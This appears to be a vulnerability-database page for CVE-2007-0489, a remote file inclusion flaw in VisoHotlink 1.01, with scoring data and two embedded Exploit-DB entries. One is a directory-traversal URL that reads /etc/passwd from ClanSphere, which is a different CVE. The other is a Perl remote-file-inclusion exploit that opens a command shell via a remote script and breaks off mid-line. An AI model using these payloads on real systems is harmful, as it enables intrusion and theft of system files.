CVE-2007-0489
published 2007-01-25CVE-2007-0489: PHP remote file inclusion vulnerability in includes/functions.visohotlink.php in VisoHotlink 1.01 and possibly earlier allows remote attackers to execute…
PriorityP343medium6.8CVSS 2.0
AVNACMAuNCPIPAP
EXPLOIT
EPSS
3.14%
86.3th percentile
PHP remote file inclusion vulnerability in includes/functions.visohotlink.php in VisoHotlink 1.01 and possibly earlier allows remote attackers to execute arbitrary PHP code via a URL in the mosConfig_absolute_path parameter.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| visohotlink | visohotlink | <= 1.01 | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
ClanSphere 2007.4.4 - 'install.php' Local File Inclusion
exploitdb·2008-01-28
CVE-2008-0489 ClanSphere 2007.4.4 - 'install.php' Local File Inclusion
ClanSphere 2007.4.4 - 'install.php' Local File Inclusion
---
source: https://www.securityfocus.com/bid/27471/info
ClanSphere is prone to a local file-include vulnerability because it fails to properly sanitize user-supplied input.
An attacker can exploit this vulnerability using directory-traversal strings to access potentially sensitive information that may aid in further attacks.
ClanSphere 2007.4.4 is vulnerable to this issue; other versions may also be affected.
http://www.example.com/install.php?lang=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00
Exploit-DB
VisoHotlink 1.01 - 'functions.visohotlink.php' Remote File Inclusion
exploitdb·2007-01-22
CVE-2007-0489 VisoHotlink 1.01 - 'functions.visohotlink.php' Remote File Inclusion
VisoHotlink 1.01 - 'functions.visohotlink.php' Remote File Inclusion
---
#!/usr/bin/perl
#
#VisoHotlink 1.0 Remote File Include Exploit
#
#Download: http://www.easy-script.com/compt.php?id=3312
#
#Vulnerable Code: require_once( $mosConfig_absolute_path . '/includes/mosGetParam.php' );
#
#Coded by bd0rk || SOH-Crew
#
#Usage: exploit.pl [target] [cmd shell] [shell variable]
#
#Greetings: str0ke, TheJT, Doener, Perle, CodeR
#
#
use LWP::UserAgent;
$Path = $ARGV[0];
$Pathtocmd = $ARGV[1];
$cmdv = $ARGV[2];
if($Path!~/http:\/\// || $Pathtocmd!~/http:\/\// || !$cmdv){usage()}
head();
while()
{
print "[shell] \$";
while()
{
$cmd=$_;
chomp($cmd);
$xpl = LWP::UserAgent->new() or die;
$req = HTTP::Request->new(GET =>$Path.'includes/functions.visohotlink.php?mosConfig_absolute_path='.$Pathtoc
No writeups or analysis indexed.
http://osvdb.org/31611http://secunia.com/advisories/23878http://www.securityfocus.com/bid/22171http://www.vupen.com/english/advisories/2007/0285https://exchange.xforce.ibmcloud.com/vulnerabilities/31654https://www.exploit-db.com/exploits/3175http://osvdb.org/31611http://secunia.com/advisories/23878http://www.securityfocus.com/bid/22171http://www.vupen.com/english/advisories/2007/0285https://exchange.xforce.ibmcloud.com/vulnerabilities/31654https://www.exploit-db.com/exploits/3175
2007-01-25
Published